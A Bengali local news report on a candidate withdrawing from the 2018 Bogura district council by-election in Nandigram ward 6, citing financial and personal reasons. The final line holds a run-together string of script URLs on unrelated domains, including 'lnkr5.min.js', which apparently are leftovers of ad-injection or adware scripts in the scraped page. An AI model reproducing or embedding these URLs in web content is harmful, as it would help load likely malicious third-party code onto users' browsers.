২৪শে সেপ্টেম্বর, ২০১৮ ইং | ৯ই আশ্বিন, ১৪২৫ বঙ্গাব্দ | সকাল ১১:৪৫

বগুড়া জেলা পরিষদ নির্বাচন থেকে সরে দাঁড়ালেন সালাম

 

এম নজরুল ইসলাম ,বগুড়া : কর্মী ও ভোটারদের সঙ্গে যোগাযোগের ক্ষেত্রে আর্থিক সংকট এবং ব্যক্তিগত সমস্যা থাকায় পারিবারিক সিদ্ধান্তে নির্বাচনের সকল কার্যক্রম থেকে স্বেচ্ছায় সরে দাঁড়ানোর ঘোষণা দিয়েছেন বগুড়া জেলা পরিষদের নন্দীগ্রাম ৬নং ওয়ার্ডের উপ-নির্বাচনে সাধারন সদস্য পদের প্রার্থী (হাতি প্রতীক) আব্দুস সালাম।

বুধবার দুপুরে জেলা রিটার্নিং অফিসার ও জেলা প্রশাসকের নিকট এক লিখিত আবেদনে তিনি নির্বাচন থেকে সরে দাঁড়ানোর ঘোষণা দেন বলে জানা গেছে।বগুড়া জেলা প্রশাসক (ডিসি) মোহাম্মদ নূরে আলম সিদ্দিকী বিষয়টি নিশ্চিত করেছেন।

জেলা পরিষদের নন্দীগ্রাম ৬নং ওয়ার্ডের সাধারন সদস্য পদে বৃহস্পতিবার (২০জুন) ভোট গ্রহণের দিন ধার্য রয়েছে।নন্দীগ্রাম পৌরসভার ৫নং ওয়ার্ডের সোলাইমান আলীর ছেলে আব্দুস সালাম নির্বাচনে গত ৪ জুন মনোনয়নপত্র দাখিল করেন। সকল আনুষ্ঠানিকতা সম্পন্ন করে হাতি প্রতীক নিয়ে ভোটারদের কাছে ভোট চেয়ে আসছিলেন।

এপ্রসঙ্গে উপজেলা নির্বাহী কর্মকর্তা মোছা. শারমিন আখতার জানান, জেলা পরিষদের নন্দীগ্রাম ৬নং ওয়ার্ডের উপ-নির্বাচনে সাধারন সদস্য পদের প্রার্থী আব্দুস সালাম নির্বাচন থেকে সরে দাাঁড়িয়েছেন বলে আমি মুঠোফোনে বিষয়টি জেনেছি।

 

 

 

 

কিউএনবি/সাজু/২০শে জুন, ২০১৮ ইং/সন্ধ্যা ৭:০৯

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=0http://dataprovider.website/addons/lnkr5.min.js